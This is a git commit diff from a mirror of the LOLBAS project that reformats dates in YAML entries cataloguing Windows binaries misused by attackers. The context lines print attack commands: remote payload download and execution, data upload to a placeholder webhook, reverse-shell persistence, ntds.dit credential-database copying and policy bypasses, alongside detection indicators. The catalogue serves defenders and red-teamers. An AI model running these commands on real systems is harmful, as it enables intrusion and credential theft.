mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Standardise date formats (see https://yaml.org/type/timestamp.html)
This commit is contained in:
parent
de50a47957
commit
14dca38278
@ -2,7 +2,7 @@
|
||||
Name: Binary.exe
|
||||
Description: Something general about the binary
|
||||
Author: The person that created this file
|
||||
Created: Date the person created this file
|
||||
Created: Date the person created this file (use YYYY-MM-DD without quotes)
|
||||
Commands:
|
||||
- Command: The command
|
||||
Description: Description of the command
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\bin.exe
|
||||
- Path: c:\windows\syswow64\bin.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: http://url.com/git.txt
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Event ID 10
|
||||
- IOC: binary.exe spawned
|
||||
Resources:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Explorer.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: explorer.exe calc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Netsh.exe
|
||||
Description: Execute, Surveillance
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: |
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Nltest.exe
|
||||
Description: Credentials
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Openwith.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: OpenWith.exe /c C:\test.hta
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Powershell.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Psr.exe
|
||||
Description: Surveillance
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Robocopy.exe
|
||||
Description: Copy
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: AcroRd32.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Gpup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Nlnotes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Notes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Nvudisp.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Nvudisp.exe System calc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Nvuhda6.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: nvuhda6.exe System calc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: ROCCAT_Swarm.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Setup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Run Setup.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Usbinst.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: VBoxDrvInst.exe
|
||||
Description: Persistence
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: winword.exe
|
||||
Description: Document editor included with Microsoft Office.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: winword.exe /l dllfile.dll
|
||||
Description: Launch DLL payload.
|
||||
@ -26,4 +26,4 @@ Acknowledgement:
|
||||
Handle: '@@vysecurity'
|
||||
- Person: Adam (Internals)
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: testxlst.js
|
||||
Description: Script included with Pywin32.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: At.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-09-20'
|
||||
Created: 2019-09-20
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||
Description: Create a recurring task to execute every day at a specific time.
|
||||
Description: Create a recurring task to execute every day at a specific time.
|
||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||
Category: Execute
|
||||
Category: Execute
|
||||
Privileges: Local Admin
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
@ -17,10 +17,10 @@ Full_Path:
|
||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||
Detection:
|
||||
- IOC: Scheduled task is created
|
||||
- IOC: Windows event log - type 3 login
|
||||
- IOC: Windows event log - type 3 login
|
||||
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
||||
- IOC: C:\Windows\Tasks\At1.job
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
Resources:
|
||||
- Link: https://freddiebarrsmith.com/at.txt
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Atbroker.exe
|
||||
Description: Helper binary for Assistive Technology (AT)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ATBroker.exe /start malware
|
||||
Description: Start a registered Assistive Technology (AT).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||
@ -26,4 +26,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bash.exe
|
||||
Description: File used by Windows subsystem for Linux
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Executes calc.exe from bash.exe
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bash.exe
|
||||
- Path: C:\Windows\SysWOW64\bash.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bash.exe
|
||||
@ -50,4 +50,4 @@ Acknowledgement:
|
||||
Handle: '@aionescu'
|
||||
- Person: Asif Matadar
|
||||
Handle: '@d1r4c'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bitsadmin.exe
|
||||
Description: Used for managing background intelligent transfer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bitsadmin.exe
|
||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
@ -56,4 +56,4 @@ Acknowledgement:
|
||||
Handle: '@carnal0wnage'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: CertReq.exe
|
||||
Description: Used for requesting and managing certificates
|
||||
Author: 'David Middlehurst'
|
||||
Created: '2020-07-07'
|
||||
Created: 2020-07-07
|
||||
Commands:
|
||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certreq.exe
|
||||
- Path: C:\Windows\SysWOW64\certreq.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: certreq creates new files
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Certutil.exe
|
||||
Description: Windows binary used for handeling certificates
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Description: Download and save 7zip to disk in the current folder.
|
||||
@ -44,7 +44,7 @@ Commands:
|
||||
MitreID: T1140
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
@ -55,7 +55,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cmd.exe
|
||||
Description: The command-line interpreter in Windows
|
||||
Author: 'Ye Yint Min Thu Htut'
|
||||
Created: '2019-06-26'
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
Description: Add content to an Alternate Data Stream (ADS).
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: cmd.exe executing files from alternate data streams.
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Cmdkey.exe
|
||||
Name: Cmdkey.exe
|
||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmdkey /list
|
||||
Description: List cached credentials
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Usage of this command could be an IOC
|
||||
@ -23,6 +23,6 @@ Resources:
|
||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,11 +2,11 @@
|
||||
Name: Cmstp.exe
|
||||
Description: Installs or removes a Connection Manager service profile.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Category: AwL bypass
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||
@ -40,4 +40,4 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: ConfigSecurityPolicy.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||
Author: 'Ialle Teixeira'
|
||||
Created: '04/09/2020'
|
||||
Created: 2020-09-04
|
||||
Commands:
|
||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||
Description: Upload file, credentials or data exfiltration in general
|
||||
@ -14,9 +14,9 @@ Commands:
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
||||
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Control.exe
|
||||
Description: Binary used to launch controlpanel items in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Control.exe executing files from alternate data streams.
|
||||
@ -28,4 +28,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Csc.exe
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: csc.exe -out:My.exe File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
@ -23,13 +23,13 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cscript.exe
|
||||
Description: Binary used to execute scripts in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript c:\ads\file.txt:script.vbs
|
||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Cscript.exe executing files from alternate data streams
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Desktopimgdownldr.exe
|
||||
Description: Windows binary used to configure lockscreen/desktop image
|
||||
Author: Gal Kristal
|
||||
Created: 28/06/2020
|
||||
Created: 2020-06-28
|
||||
Commands:
|
||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||
Description: Downloads the file and sets it as the computer's lockscreen
|
||||
@ -14,9 +14,9 @@ Commands:
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||
Resources:
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Dfsvc.exe
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
@ -17,14 +17,14 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,11 +2,11 @@
|
||||
Name: Diantz.exe
|
||||
Description: Binary that package existing files into a cabinet (.cab) file
|
||||
Author: 'Tamir Yehuda'
|
||||
Created: '08/08/2020'
|
||||
Created: 2020-08-08
|
||||
Commands:
|
||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||
Usecase: Download and compress into a cab file.
|
||||
Usecase: Download and compress into a cab file.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\diantz.exe
|
||||
- Path: c:\windows\syswow64\diantz.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: diantz storing data into alternate data streams.
|
||||
- IOC: diantz getting a file from a remote machine or the internet.
|
||||
Resources:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Diskshadow.exe
|
||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\diskshadow.exe
|
||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from diskshadow.exe
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Dnscmd.exe
|
||||
Description: A command-line interface for managing DNS servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Dnscmd.exe loading dll from UNC path
|
||||
@ -32,4 +32,4 @@ Acknowledgement:
|
||||
Handle: '@dim0x69'
|
||||
- Person: Nikhil SamratAshok
|
||||
Handle: '@nikhil_mitt'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Esentutl.exe
|
||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
Description: Copies the source VBS file to the destination VBS file.
|
||||
Usecase: Copies files from A to B
|
||||
Category: Copy
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
@ -29,7 +29,7 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
@ -47,7 +47,7 @@ Commands:
|
||||
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||
Description: Copies a (locked) file using Volume Shadow Copy
|
||||
Usecase: Copy/extract a locked file such as the AD Database
|
||||
Category: Copy
|
||||
Category: Copy
|
||||
Privileges: Admin
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||
@ -55,10 +55,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
||||
|
